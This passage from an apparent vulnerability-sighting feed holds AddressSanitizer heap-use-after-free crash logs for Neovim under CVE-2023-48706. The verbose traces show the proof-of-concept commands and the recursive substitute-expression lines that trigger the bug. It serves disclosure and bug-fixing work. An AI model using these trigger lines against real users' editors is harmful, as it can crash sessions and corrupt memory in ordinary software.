0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n #14 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n #15 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n #16 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #17 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #18 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #19 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #20 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #21 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #22 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n #23 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #24 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #25 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #26 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #27 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #28 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #29 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #30 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #31 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #32 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #33 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #34 0x45df4d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x45df4d)\n\n0x60200003b1f5 is located 5 bytes inside of 7-byte region [0x60200003b1f0,0x60200003b1f7)\nfreed by thread T0 here:\n #0 0x4d640d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d640d)\n #1 0xb5f304 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:3\n #2 0x8b814b in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3260:3\n #3 0x8c7356 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3546:7\n #4 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #5 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #6 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #7 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #8 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #9 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #10 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n #11 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n #12 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n #13 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n #14 0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n #15 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n #16 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n #17 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n #18 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n #19 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n #20 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n #21 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n #22 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n #23 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #24 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #25 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #26 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #27 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #28 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #29 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n\npreviously allocated by thread T0 here:\n #0 0x4d668d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d668d)\n #1 0xb5f062 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:74:15\n #2 0xb5f224 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:108:15\n #3 0xb5f66d in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:187:15\n #4 0xb5f6e8 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:205:17\n #5 0xb5fe3b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:424:10\n #6 0x8c7260 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3547:16\n #7 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n #8 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #9 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #10 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n #11 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n #12 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n #13 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n #14 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #15 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #16 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #17 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #18 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #19 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #20 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #21 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #22 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #23 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #24 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78) in strlen\nShadow bytes around the buggy address:\n 0x0c047ffff5e0: fa fa 00 fa fa fa 05 fa fa fa 01 fa fa fa 01 fa\n 0x0c047ffff5f0: fa fa 01 fa fa fa fd fd fa fa 05 fa fa fa 01 fa\n 0x0c047ffff600: fa fa fd fd fa fa 00 01 fa fa fd fd fa fa fd fa\n 0x0c047ffff610: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 fa\n 0x0c047ffff620: fa fa 01 fa fa fa fd fa fa fa fd fa fa fa fd fa\n=>0x0c047ffff630: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n 0x0c047ffff640: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n 0x0c047ffff650: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n 0x0c047ffff660: fa fa 02 fa fa fa 06 fa fa fa 07 fa fa fa 02 fa\n 0x0c047ffff670: fa fa fd fa fa fa 06 fa fa fa 02 fa fa fa fd fa\n 0x0c047ffff680: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==25706==ABORTING", "creation_timestamp": "2026-06-13T13:00:31.000000Z"} {"uuid": "68f7c78b-5751-43b4-a03c-6663a20e4fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48706", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/6067ed1ca2a2492793f7e001d36dd0f9", "content": "Command:\n./nvim-0.9.5 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting: aunmenu *\n\nExecuting: vnoremenu PopUp.Cut \"+x\n\nExecuting: vnoremenu PopUp.Copy \"+y\n\nExecuting: anoremenu PopUp.Paste \"+gP\n\nExecuting: vnoremenu PopUp.Paste \"+P\n\nExecuting: vnoremenu PopUp.Delete \"_x\n\nExecuting: nnoremenu PopUp.Select\\ All ggVG\n\nExecuting: vnoremenu PopUp.Select\\ All gg0oG$\n\nExecuting: inoremenu PopUp.Select\\ All VG\n\nExecuting: anoremenu PopUp.-1- \n\nExecuting: anoremenu PopUp.How-to\\ disable\\ mouse help disable-mouse\n\nExecuting: \n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling Test_aaaa_substitute_expr_recursive_special()\n\nline 1: func R()\n\nline 5: new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6: put ='abcdef'\n\nline 7: let bufnr = bufnr('%')\n\nline 8: try\n\nline 9: silent! :s/./~\\=R()/0\n\nline 10: \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11: let @/='.'\n\nline 12: ~g\n\ncalling R()\n\nline 1: \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2: %s/./\\='.'/gn\n\n6 matches on 1 line\nR returning #0\n\ncontinuing in Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25534==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000071f5 at pc 0x00000072d4cb bp 0x7ffc4943b720 sp 0x7ffc4943b718\nREAD of size 1 at 0x6020000071f5 thread T0\n #0 0x72d4ca in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24\n #1 0x948f4e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:510:10\n #2 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n #3 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n #4 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n #5 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n #6 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n #7 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n #8 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n #9 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n #10 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n #11 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n #12 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n #13 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n #14 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n #15 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #19 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n #20 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n #21 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n #22 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n #23 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n #24 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #25 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #26 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #27 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #28 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #29 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #30 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #31 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #32 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #33 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #34 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #35 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #36 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #37 0x467f7d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x467f7d)\n\n0x6020000071f5 is located 5 bytes inside of 7-byte region [0x6020000071f0,0x6020000071f7)\nfreed by thread T0 here:\n #0 0x4e043d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e043d)\n #1 0xca29a9 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:134:3\n #2 0x9b0bcb in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3081:3\n #3 0x9b471a in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3387:7\n #4 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #5 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #6 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #7 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #8 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n #9 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n #10 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n #11 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n #12 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n #13 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n #14 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n #15 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n #16 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n #17 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n #18 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n #19 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n #20 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n #21 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n #22 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n #23 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n #24 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n #25 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #26 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #27 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #28 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #29 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n\npreviously allocated by thread T0 here:\n #0 0x4e06bd in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e06bd)\n #1 0xca2787 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:88:15\n #2 0xca2954 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:15\n #3 0xca2ba1 in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:194:15\n #4 0xca2c18 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:212:17\n #5 0xca336b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:431:10\n #6 0x9b4624 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3388:16\n #7 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #8 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #9 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #10 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #11 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n #12 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n #13 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n #14 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n #15 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #19 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #20 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #21 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #22 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #23 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #24 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #25 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #26 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #27 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #28 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24 in skipwhite\nShadow bytes around the buggy address:\n 0x0c047fff8de0: fa fa 05 fa fa fa 01 fa fa fa 01 fa fa fa fd fd\n 0x0c047fff8df0: fa fa 05 fa fa fa 01 fa fa fa fd fa fa fa fd fd\n 0x0c047fff8e00: fa fa 00 01 fa fa fd fd fa fa fd fa fa fa fd fa\n 0x0c047fff8e10: fa fa fd fa fa fa 01 fa fa fa 00 fa fa fa 01 fa\n 0x0c047fff8e20: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\n=>0x0c047fff8e30: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n 0x0c047fff8e40: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n 0x0c047fff8e50: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n 0x0c047fff8e60: fa fa fd fa fa fa 02 fa fa fa 06 fa fa fa 07 fa\n 0x0c047fff8e70: fa fa 02 fa fa fa fd fa fa fa fd fd fa fa 00 02\n 0x0c047fff8e80: fa fa 06 fa fa fa 02 fa fa fa 02 fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==25534==ABORTING\n\n\nCommand:\n./nvim-0.6.1 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd BufReadCmd term://* ++nested if !exists('b:term_title')|call termopen(matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\$.\\{-}\$//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: augroup nvim_cmdwin\n\nExecuting: autocmd! CmdwinEnter [:>] syntax sync minlines=1 maxlines=1\n\nExecuting: augroup END\n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling function Test_aaaa_substitute_expr_recursive_special()\n\nline 1: func R()\n\nline 5: new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6: put ='abcdef'\n\nline 7: let bufnr = bufnr('%')\n\nline 8: try\n\nline 9: silent! :s/./~\\=R()/0\n\nline 10: \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11: let @/='.'\n\nline 12: ~g\n\ncalling function Test_aaaa_substitute_expr_recursive_special[12]..R()\n\nline 1: \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2: %s/./\\='.'/gn\n\n6 matches on 1 line\nfunction Test_aaaa_substitute_expr_recursive_special[12]..R returning #0\n\ncontinuing in function Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25706==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200003b1f5 at pc 0x000000470b79 bp 0x7ffcce6c53f0 sp 0x7ffcce6c4bb0\nREAD of size 1 at 0x60200003b1f5 thread T0\n #0 0x470b78 in strlen (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78)\n #1 0x6c03ef in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1163:27\n #2 0x86ce1e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:474:10\n #3 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n #4 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n #5 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n #6 0x79b97c in eval5 